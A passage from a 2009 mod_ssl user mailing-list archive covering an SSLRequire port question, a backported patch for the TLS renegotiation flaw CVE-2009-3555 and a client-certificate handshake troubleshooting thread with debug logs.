	by master.modssl.org (Postfix) with ESMTP id 632A214D838
	for ; Mon,  9 Nov 2009 22:04:42 +0100 (CET)
Received: from frfcqws071ix328.infra.montpellier.mebs.ihost.com (frfcqws071ix328 [10.0.77.8])
	by frfcqmg011ix3r8.montpellier.mebs.ihost.com (8.12.11.20060308/8.12.11) with ESMTP id nA9L311D021426
	for ; Mon, 9 Nov 2009 22:03:02 +0100
Subject: Jean-Pierre Guilloteau est absent.
From: jpguilloteau@aspaway.fr
To: modssl-users@modssl.org
Message-ID: 
Date: Mon, 9 Nov 2009 22:02:55 +0100
X-MIMETrack: Serialize by Router on MES01ASP/SRV/ASPAWAY(Release 7.0.2|September 26, 2006) at
 11/09/2009 10:03:02 PM
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: jpguilloteau@aspaway.fr
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I will be out of the office starting Fri 06/11/09 and will not return until
Mon 16/11/09.

I will respond to your message when I return.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov 19 21:20:41 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 57CD214DA5C; Thu, 19 Nov 2009 21:20:41 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from homiemail-a1.g.dreamhost.com (caiajhbdcaid.dreamhost.com [208.97.132.83])
	by master.modssl.org (Postfix) with ESMTP id C05E114D88C
	for ; Thu, 19 Nov 2009 21:20:24 +0100 (CET)
Received: from darsys9 (cpe-66-108-142-190.nyc.res.rr.com [66.108.142.190])
	(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
	(No client certificate requested)
	by homiemail-a1.g.dreamhost.com (Postfix) with ESMTP id C5841119E19
	for ; Thu, 19 Nov 2009 12:18:43 -0800 (PST)
Received: from [10.1.0.2]
	by darsys9 with esmtp (Exim 4.69)
	(envelope-from )
	id 1NBDSk-0003LI-L6
	for modssl-users@modssl.org; Thu, 19 Nov 2009 15:18:42 -0500
Message-ID: <4B05A834.6040807@darose.net>
Date: Thu, 19 Nov 2009 15:19:00 -0500
From: David Rosenstrauch 
User-Agent: Thunderbird 2.0.0.23 (X11/20091001)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: SSLRequire problem
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: David Rosenstrauch 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi.  I'm tearing my hair out over an SSLRequire directive that doesn't 
seem to be working.  Can anyone help?

The directive is actually quite simple:

    # Require SSL over non-obvious port 81 for SVN access
    SSLRequire %{SERVER_PORT} == 81

This is actually working fine when the client is a web browser.  (i.e., 
using HTTPD method GET).

But the server is actually hosting Subversion (via WebDAV), so the 
client is an SVN client (which uses HTTP methods OPTIONS, PROPFIND, and 
REPORT).  And when the URL is accessed that way it fails, with the 
following appearing in the log:

[Thu Nov 19 19:37:53 2009] [error] [client ] access to 
 failed, reason: SSL requirement expression not fulfilled 
(see SSL logfile for more details)

Even when I crank up the debugging, I still don't get any useful info as 
to what's happening:

[Thu Nov 19 19:37:53 2009] [info] Failed expression: %{SERVER_PORT} == 81

Anyone have any idea what's going on here?  Is there any way to debug 
the SSLRequire expression?

I'm using mod_ssl 2.2.3 with Apache on CentOS 5.2.

Thanks,

DR
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov 20 10:52:14 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 7CE2714DA28; Fri, 20 Nov 2009 10:52:14 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mx1.redhat.com (mx1.redhat.com [209.132.183.28])
	by master.modssl.org (Postfix) with ESMTP id D357314D839
	for ; Fri, 20 Nov 2009 10:51:57 +0100 (CET)
Received: from int-mx05.intmail.prod.int.phx2.redhat.com (int-mx05.intmail.prod.int.phx2.redhat.com [10.5.11.18])
	by mx1.redhat.com (8.13.8/8.13.8) with ESMTP id nAK9oF8G006569
	(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=OK);
	Fri, 20 Nov 2009 04:50:15 -0500
Received: from turnip.manyfish.co.uk (vpn-9-209.rdu.redhat.com [10.11.9.209])
	by int-mx05.intmail.prod.int.phx2.redhat.com (8.13.8/8.13.8) with ESMTP id nAK9oDnE002506
	(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NO);
	Fri, 20 Nov 2009 04:50:14 -0500
Received: from jorton by turnip.manyfish.co.uk with local (Exim 4.69)
	(envelope-from )
	id 1NBQ84-0002N9-Fq; Fri, 20 Nov 2009 09:50:12 +0000
Date: Fri, 20 Nov 2009 09:50:12 +0000
From: Joe Orton 
To: David Rosenstrauch 
Cc: modssl-users@modssl.org
Subject: Re: SSLRequire problem
Message-ID: <20091120095012.GA3046@redhat.com>
Mail-Followup-To: David Rosenstrauch ,
	modssl-users@modssl.org
References: <4B05A834.6040807@darose.net>
MIME-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline
In-Reply-To: <4B05A834.6040807@darose.net>
User-Agent: Mutt/1.5.19 (2009-01-05)
Organization: Red Hat UK Ltd, Amberley Place, 107-111 Peascod Street, Windsor, Berkshire, SL4 1TE, United Kingdom.
  Registered in UK and Wales under Company Registration No. 03798903
  Directors: Michael Cunningham (USA), Brendan Lane (Ireland), Matt Parson (USA), Charlie Peters (USA)
X-Scanned-By: MIMEDefang 2.67 on 10.5.11.18
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, Nov 19, 2009 at 03:19:00PM -0500, David Rosenstrauch wrote:
> Hi.  I'm tearing my hair out over an SSLRequire directive that doesn't  
> seem to be working.  Can anyone help?
>
> The directive is actually quite simple:
>
>    # Require SSL over non-obvious port 81 for SVN access
>    SSLRequire %{SERVER_PORT} == 81

The port which %{SERVER_PORT} expands to is determined by the settings 
of UseCanonicalPhysicalPort and UseCanonicalName.  For different 
combinations it will depend on either what the client sends in the 
request's Host header, what the ServerName directive is set to in the 
vhost, or what httpd derives as the "canonical" name for the vhost to be 
otherwise.

See docs for more info:

http://httpd.apache.org/docs/2.2/mod/core.html#usecanonicalname
http://httpd.apache.org/docs/2.2/mod/core.html#usecanonicalphysicalport

Regards, Joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov 20 16:30:14 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 481F214D9E6; Fri, 20 Nov 2009 16:30:14 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from homiemail-a10.g.dreamhost.com (caiajhbdccah.dreamhost.com [208.97.132.207])
	by master.modssl.org (Postfix) with ESMTP id 8422714D839
	for ; Fri, 20 Nov 2009 16:29:57 +0100 (CET)
Received: from darsys9 (cpe-66-108-142-190.nyc.res.rr.com [66.108.142.190])
	(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
	(No client certificate requested)
	by homiemail-a10.g.dreamhost.com (Postfix) with ESMTPSA id 6FD5328006B
	for ; Fri, 20 Nov 2009 07:28:17 -0800 (PST)
Received: from [10.1.0.2]
	by darsys9 with esmtp (Exim 4.69)
	(envelope-from )
	id 1NBVPB-0000Xo-2B
	for modssl-users@modssl.org; Fri, 20 Nov 2009 10:28:13 -0500
Message-ID: <4B06B5A1.2080005@darose.net>
Date: Fri, 20 Nov 2009 10:28:33 -0500
From: David Rosenstrauch 
User-Agent: Thunderbird 2.0.0.23 (X11/20091001)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: SSLRequire problem
References: <4B05A834.6040807@darose.net> <20091120095012.GA3046@redhat.com>
In-Reply-To: <20091120095012.GA3046@redhat.com>
Content-Type: text/plain; charset=utf-8; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: David Rosenstrauch 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On 11/20/2009 04:50 AM, Joe Orton wrote:
> On Thu, Nov 19, 2009 at 03:19:00PM -0500, David Rosenstrauch wrote:
>> Hi.  I'm tearing my hair out over an SSLRequire directive that doesn't  
>> seem to be working.  Can anyone help?
>>
>> The directive is actually quite simple:
>>
>>    # Require SSL over non-obvious port 81 for SVN access
>>    SSLRequire %{SERVER_PORT} == 81
> 
> The port which %{SERVER_PORT} expands to is determined by the settings 
> of UseCanonicalPhysicalPort and UseCanonicalName.  For different 
> combinations it will depend on either what the client sends in the 
> request's Host header, what the ServerName directive is set to in the 
> vhost, or what httpd derives as the "canonical" name for the vhost to be 
> otherwise.
> 
> See docs for more info:
> 
> http://httpd.apache.org/docs/2.2/mod/core.html#usecanonicalname
> http://httpd.apache.org/docs/2.2/mod/core.html#usecanonicalphysicalport
> 
> Regards, Joe

Huh!  Never heard of those before!

OK, well, I'm still not sure I quite understand the reason why, but 
"UseCanonicalPhysicalPort on" does seem to have fixed the problem.

Thanks much for the help!

DR
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Nov 22 01:23:33 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 3390014DA73; Sun, 22 Nov 2009 01:23:33 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mailserver.kippdata.de (capsella.kippdata.de [195.227.30.149])
	by master.modssl.org (Postfix) with ESMTP id 22E3714D839
	for ; Sun, 22 Nov 2009 01:23:13 +0100 (CET)
Received: from [192.168.2.100] ([192.168.2.100])
	by mailserver.kippdata.de (8.13.5/8.13.5) with ESMTP id nAM0LXTG003828
	for ; Sun, 22 Nov 2009 01:21:33 +0100 (CET)
Message-ID: <4B08840C.4000203@kippdata.de>
Date: Sun, 22 Nov 2009 01:21:32 +0100
From: Rainer Jung 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.4pre) Gecko/20090915 Thunderbird/3.0b4
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: [PATCH] Backport patch for CVE-2009-3555 from Apache 2.x
Content-Type: text/plain; charset=ISO-8859-15
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Rainer Jung 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

I backported the patch against CVE-2009-3555 from Apache trunk, 2.2 and
2.0 (proposed). The patch is available at

http://people.apache.org/~rjung/patches/cve-2009-3555_mod_ssl_2_8_21-1_3_41.patch

CVE-2009-3555 is about the Man in the Middle attack against HTTPS.
The patch disables the use of client initiated SSL renegotiation. Server
initiated reneg is still allowed (and vulnerable).

See also:

http://svn.apache.org/viewvc?rev=833582&view=rev
http://svn.apache.org/viewvc?rev=833622&view=rev
http://people.apache.org/~rjung/patches/cve-2009-3555_httpd_2_0_x-v2.patch

Backport is not totally straightforward, because the original patches
use the filter architecture not present in Apache 1.3.

Any Feedback on the patch is welcome. Some additional debug output can
be activated by using -DRENEG_DEBUG.

Regards,

Rainer
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov 23 01:32:02 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 7124714DA74; Mon, 23 Nov 2009 01:32:02 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from genki.phocean.net (89-159-121-109.rev.dartybox.com [89.159.121.109])
	by master.modssl.org (Postfix) with ESMTP id B644614D83F
	for ; Mon, 23 Nov 2009 01:31:45 +0100 (CET)
Received: from localhost (localhost [127.0.0.1])
	by genki.phocean.net (Postfix) with ESMTP id E291960061
	for ; Mon, 23 Nov 2009 01:33:22 +0100 (CET)
X-Virus-Scanned: amavisd-new at phocean.net
Received: from genki.phocean.net ([127.0.0.1])
	by localhost (genki.phocean.net [127.0.0.1]) (amavisd-new, port 10024)
	with ESMTP id QnHL+x8uaJGf for ;
	Mon, 23 Nov 2009 01:33:16 +0100 (CET)
Received: from [192.168.222.10] (89-159-121-109.rev.dartybox.com [89.159.121.109])
	(using TLSv1 with cipher DHE-RSA-CAMELLIA256-SHA (256/256 bits))
	(No client certificate requested)
	by genki.phocean.net (Postfix) with ESMTPSA id 9F99960060
	for ; Mon, 23 Nov 2009 01:33:15 +0100 (CET)
Subject: error in SSLv2/v3 read client hello A
From: Jean-Christophe Baptiste 
To: modssl-users@modssl.org
Content-Type: multipart/signed; micalg="pgp-sha1"; protocol="application/pgp-signature"; boundary="=-GqA1f0IobZ3N8TL07EHH"
Date: Mon, 23 Nov 2009 01:29:29 +0100
Message-Id: <1258936169.24826.18.camel@thinkpad.phocean>
Mime-Version: 1.0
X-Mailer: Evolution 2.28.0 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jean-Christophe Baptiste 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


--=-GqA1f0IobZ3N8TL07EHH
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: quoted-printable

Hi all,

I have been using client certificate for a while (more than 2 years)
successfuly.

But now, after migrating a server, I am stuck with a problem that I have
no idea how to handle.
I just spent 10 hours googling around and reading the doc without
finding any clue.

On my new set-up, the web browser seems to reject the negociation :

[Sun Nov 22 22:51:36 2009] [info] [client ::1] Connection to child 2
established (server www.***.net:443)
[Sun Nov 22 22:51:36 2009] [info] Seeding PRNG with 656 bytes of entropy
[Sun Nov 22 22:51:36 2009] [debug] ssl_engine_kernel.c(1875): OpenSSL:
Handshake: start
[Sun Nov 22 22:51:36 2009] [debug] ssl_engine_kernel.c(1883): OpenSSL:
Loop: before/accept initialization
[Sun Nov 22 22:51:36 2009] [debug] ssl_engine_io.c(1858): OpenSSL: read
11/11 bytes from BIO#7f35d1213840 [mem: 7f35d1218f00] (BIO dump follows)
[Sun Nov 22 22:51:36 2009] [debug] ssl_engine_io.c(1791):
+-------------------------------------------------------------------------+
[Sun Nov 22 22:51:36 2009] [debug] ssl_engine_io.c(1830): | 0000: 4f 50
54 49 4f 4e 53 20-2a 20 48                 OPTIONS * H      |
[Sun Nov 22 22:51:36 2009] [debug] ssl_engine_io.c(1836):
+-------------------------------------------------------------------------+
[Sun Nov 22 22:51:36 2009] [debug] ssl_engine_kernel.c(1912): OpenSSL:
Exit: error in SSLv2/v3 read client hello A
[Sun Nov 22 22:51:36 2009] [info] [client ::1] SSL library error 1 in
handshake (server www.***.net:443)
[Sun Nov 22 22:51:36 2009] [info] SSL Library Error: 336027900
error:140760FC:SSL routines:SSL23_GET_CLIENT_HELLO:unknown protocol
speaking not SSL to HTTPS port!?
[Sun Nov 22 22:51:36 2009] [info] [client ::1] Connection closed to
child 2 with abortive shutdown (server www.***.net:443)

I have tried a bund of different settings. Of course, I re-generated
several times all the certificates, from the CA to the client.
Both the CA and the client were imported into the web browser.

The mod-ssl settings are in no point different from the previous
machine, so am I missing ?

So any help, any hint would be greatly appreciated.

Thank you in advance,

Regards,
Jean-Christophe





--=-GqA1f0IobZ3N8TL07EHH
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: Ceci est une partie de message
 =?ISO-8859-1?Q?num=E9riquement?= =?ISO-8859-1?Q?_sign=E9e?=

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.12 (GNU/Linux)

iQIcBAABAgAGBQJLCddpAAoJEEElXOw26xO+4CgP/ieQEHn269sdyTMaKIrqVYHN
9bIYJedzekLrt1DhrToUOA3aE0diqWxLIDnKN5NYdlPcMjRPSsdI+HvflwIHqK7c
mUjSUyzcD5uDVUzE1KQBPf0MGtwlW/QjtNTC7VSUeDlLlElM5EecPFbsA2lCU7CO
cLGf1ubnGIVwtdSv0mmo19OmIJ/UBnNAQVhNjj35faA8yaG8SXZDGum3RGNEbzac
bteV0nY3vyEx2zfjdKi1C4JWFKDqOApx+dj/tPIacYdBaC2fqlKpPk03/4f4usDz
tiHHNNFBVf542oSJgx30Uhi7twl+L1hEtZPadgsqQ4WS/mM5LTIIG8422Qw8SmqU
fiQIAYy1LUgzKTI55A1aZ9XH9xfRLAHHyUEVKTbkTKnfisy26sG3uXVKffqunmgr
gg4guhdyNJT55Ee4oOJMn+GRgxsIcFcNF7ovTwfi+nyFIO0yQfu5mGL6EVpXPV4u
jsuQ9bzwZ8jlbTMGxltZ3OmYRqHFmgYzodA++HnCH+XPXzOYoqnKg90HQY85tiiK
5htLBheW0k9/TWLdTKmeGjZ8pc8i0Tja44m1fUTzAddwW9SELeUzZBYtiI16gibv
OmPDgKRG3Rcxb7NeNVz8LiSAAPs4ec93PdKqeHCAwh4no6+Ha6pH924pnO4+tFgZ
sEOz+zKDY5c80LnuueGJ
=Wsw8
-----END PGP SIGNATURE-----

--=-GqA1f0IobZ3N8TL07EHH--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov 23 18:59:55 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 1496614DA80; Mon, 23 Nov 2009 18:59:55 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mx1.cpanel.net (mx1.cpanel.net [208.74.121.68])
	by master.modssl.org (Postfix) with ESMTP id 8009A14D83F
	for ; Mon, 23 Nov 2009 18:59:37 +0100 (CET)
Received: from ng1.cptxoffice.net ([208.74.121.102] helo=[192.168.90.86])
	by mx1.cpanel.net with esmtpsa (TLSv1:AES256-SHA:256)
	(Exim 4.69)
	(envelope-from )
	id 1NCdAb-0001Fe-N6
	for modssl-users@modssl.org; Mon, 23 Nov 2009 11:57:49 -0600
Subject: Re: [PATCH] Backport patch for CVE-2009-3555 from Apache 2.x
From: John Lightsey 
To: modssl-users@modssl.org
In-Reply-To: <4B08840C.4000203@kippdata.de>
References: <4B08840C.4000203@kippdata.de>
Content-Type: text/plain
Date: Mon, 23 Nov 2009 11:57:55 -0600
Message-Id: <1258999075.4992.15.camel@work.cptxoffice.net>
Mime-Version: 1.0
X-Mailer: Evolution 2.22.3.1 
Content-Transfer-Encoding: 7bit
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - mx1.cpanel.net
X-AntiAbuse: Original Domain - modssl.org
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - cpanel.net
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John Lightsey 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Sun, 2009-11-22 at 01:21 +0100, Rainer Jung wrote:
> Backport is not totally straightforward, because the original patches
> use the filter architecture not present in Apache 1.3.
> 
> Any Feedback on the patch is welcome. Some additional debug output can
> be activated by using -DRENEG_DEBUG.
> 

There are a few lines of c99 syntax in this patch (variable declarations
of "char *reneg" in the middle of code) that cause it to fail with gcc
2.95.

Seems to work fine otherwise.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov 23 22:01:44 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5B22F14DA83; Mon, 23 Nov 2009 22:01:44 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mailserver.kippdata.de (capsella.kippdata.de [195.227.30.149])
	by master.modssl.org (Postfix) with ESMTP id D45C614D83F
	for ; Mon, 23 Nov 2009 22:01:27 +0100 (CET)
Received: from [195.227.30.209] (notebook-rj [195.227.30.209])
	by mailserver.kippdata.de (8.13.5/8.13.5) with ESMTP id nANKxl41014406
	for ; Mon, 23 Nov 2009 21:59:47 +0100 (CET)
Message-ID: <4B0AF7BD.4020304@kippdata.de>
Date: Mon, 23 Nov 2009 21:59:41 +0100
From: Rainer Jung 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.4pre) Gecko/20090915 Thunderbird/3.0b4
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: [PATCH] Backport patch for CVE-2009-3555 from Apache 2.x
References: <4B08840C.4000203@kippdata.de> <1258999075.4992.15.camel@work.cptxoffice.net>
In-Reply-To: <1258999075.4992.15.camel@work.cptxoffice.net>
Content-Type: text/plain; charset=ISO-8859-15
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Rainer Jung 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On 23.11.2009 18:57, John Lightsey wrote:
> On Sun, 2009-11-22 at 01:21 +0100, Rainer Jung wrote:
>> Backport is not totally straightforward, because the original patches
>> use the filter architecture not present in Apache 1.3.
>>
>> Any Feedback on the patch is welcome. Some additional debug output can
>> be activated by using -DRENEG_DEBUG.
>>
> 
> There are a few lines of c99 syntax in this patch (variable declarations
> of "char *reneg" in the middle of code) that cause it to fail with gcc
> 2.95.

Sorry, I forgot to fix those. Thanks for the feedback.

> Seems to work fine otherwise.

Good to know! The more eyes the better.

Regards,

Rainer
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov 23 22:14:15 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id F075614DA83; Mon, 23 Nov 2009 22:14:15 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mailserver.kippdata.de (capsella.kippdata.de [195.227.30.149])
	by master.modssl.org (Postfix) with ESMTP id 9FB0014D83F
	for ; Mon, 23 Nov 2009 22:13:59 +0100 (CET)
Received: from [195.227.30.209] (notebook-rj [195.227.30.209])
	by mailserver.kippdata.de (8.13.5/8.13.5) with ESMTP id nANLCJ6q015223
	for ; Mon, 23 Nov 2009 22:12:19 +0100 (CET)
Message-ID: <4B0AFAAD.2000504@kippdata.de>
Date: Mon, 23 Nov 2009 22:12:13 +0100
From: Rainer Jung 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.4pre) Gecko/20090915 Thunderbird/3.0b4
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: [PATCH] Backport patch for CVE-2009-3555 from Apache 2.x
References: <4B08840C.4000203@kippdata.de> <1258999075.4992.15.camel@work.cptxoffice.net>
In-Reply-To: <1258999075.4992.15.camel@work.cptxoffice.net>
Content-Type: text/plain; charset=ISO-8859-15
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Rainer Jung 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On 23.11.2009 18:57, John Lightsey wrote:
> On Sun, 2009-11-22 at 01:21 +0100, Rainer Jung wrote:
>> Backport is not totally straightforward, because the original patches
>> use the filter architecture not present in Apache 1.3.
>>
>> Any Feedback on the patch is welcome. Some additional debug output can
>> be activated by using -DRENEG_DEBUG.
>>
> 
> There are a few lines of c99 syntax in this patch (variable declarations
> of "char *reneg" in the middle of code) that cause it to fail with gcc
> 2.95.
> 
> Seems to work fine otherwise.

Thanks again. I updated the patch:

http://people.apache.org/~rjung/patches/cve-2009-3555_mod_ssl_2_8_21-1_3_41-v2.patch

The only changes are in ssl_engine_io.c, where the declaration of "char
*reneg" is moved 4 times to the beginning of the function. Anything else
you observed?

Regards,

Rainer
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov 24 17:22:44 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5172F14DA3B; Tue, 24 Nov 2009 17:22:44 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from genki.phocean.net (89-159-121-109.rev.dartybox.com [89.159.121.109])
	by master.modssl.org (Postfix) with ESMTP id ED8A014D839
	for ; Tue, 24 Nov 2009 17:22:35 +0100 (CET)
Received: from localhost (localhost [127.0.0.1])
	by genki.phocean.net (Postfix) with ESMTP id A5CE860063;
	Tue, 24 Nov 2009 17:24:22 +0100 (CET)
X-Virus-Scanned: amavisd-new at phocean.net
Received: from genki.phocean.net ([127.0.0.1])
	by localhost (genki.phocean.net [127.0.0.1]) (amavisd-new, port 10024)
	with ESMTP id QpX8rIMQ0htM; Tue, 24 Nov 2009 17:24:17 +0100 (CET)
Received: from www.phocean.net (localhost [127.0.0.1])
	(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
	(No client certificate requested)
	by genki.phocean.net (Postfix) with ESMTPSA id 83E2D60062;
	Tue, 24 Nov 2009 17:24:17 +0100 (CET)
MIME-Version: 1.0
Date: Tue, 24 Nov 2009 17:24:17 +0100
From: Jean-Christophe Baptiste 
To: Jean-Christophe Baptiste 
Cc: 
Subject: Re: error in SSLv2/v3 read client hello A
In-Reply-To: <1258936169.24826.18.camel@thinkpad.phocean>
References: <1258936169.24826.18.camel@thinkpad.phocean>
Message-ID: 
X-Sender: jc@phocean.net
User-Agent: RoundCube Webmail/0.3.1
Content-Transfer-Encoding: 8bit
Content-Type: text/plain; charset=UTF-8
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jean-Christophe Baptiste 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I am still stack with the same issue :

[Tue Nov 24 16:56:15 2009] [debug] ssl_engine_kernel.c(1875): OpenSSL:
Handshake: start
[Tue Nov 24 16:56:15 2009] [debug] ssl_engine_kernel.c(1883): OpenSSL:
Loop: before accept initialization
[Tue Nov 24 16:56:15 2009] [debug] ssl_engine_kernel.c(1893): OpenSSL:
Write: SSLv3 read client hello A
[Tue Nov 24 16:56:15 2009] [debug] ssl_engine_kernel.c(1912): OpenSSL:
Exit: error in SSLv3 read client hello A
[Tue Nov 24 16:56:15 2009] [error] [client 194.2.193.253] Re-negotiation
handshake failed: Not accepted by client!?
[Tue Nov 24 16:56:23 2009] [debug] ssl_engine_io.c(1869): OpenSSL: I/O
error, 5 bytes expected to read on BIO#7f313d364fc0 [mem: 7f313d8641a0]

I renewed one more time all my certificates, so I don't think there is
anything wrong with it.
My apache configuration hasn't changed :

 SSLRequireSSL
 SSLVerifyClient require
 SSLVerifyDepth 1
 Order allow,deny
 allow from All


And any browser (Firefox, Opera) fail so I don't think it is a browser
issue.
Of course, I imported the CA and the client certificate...

And still no prompt for the client certificate...

Really no hint ? Could it be a bug in the distro package ?

Thanks.

On Mon, 23 Nov 2009 01:29:30 +0100, Jean-Christophe Baptiste
 wrote:
> Hi all,
> 
> I have been using client certificate for a while (more than 2 years)
> successfuly.
> 
> But now, after migrating a server, I am stuck with a problem that I have
> no idea how to handle.
> I just spent 10 hours googling around and reading the doc without
> finding any clue.
> 
> On my new set-up, the web browser seems to reject the negociation :
> 
> [Sun Nov 22 22:51:36 2009] [info] [client ::1] Connection to child 2
> established (server www.***.net:443)
> [Sun Nov 22 22:51:36 2009] [info] Seeding PRNG with 656 bytes of entropy
> [Sun Nov 22 22:51:36 2009] [debug] ssl_engine_kernel.c(1875): OpenSSL:
> Handshake: start
> [Sun Nov 22 22:51:36 2009] [debug] ssl_engine_kernel.c(1883): OpenSSL:
> Loop: before/accept initialization
> [Sun Nov 22 22:51:36 2009] [debug] ssl_engine_io.c(1858): OpenSSL: read
> 11/11 bytes from BIO#7f35d1213840 [mem: 7f35d1218f00] (BIO dump follows)
> [Sun Nov 22 22:51:36 2009] [debug] ssl_engine_io.c(1791):
>
+-------------------------------------------------------------------------+
> [Sun Nov 22 22:51:36 2009] [debug] ssl_engine_io.c(1830): | 0000: 4f 50
> 54 49 4f 4e 53 20-2a 20 48                 OPTIONS * H      |
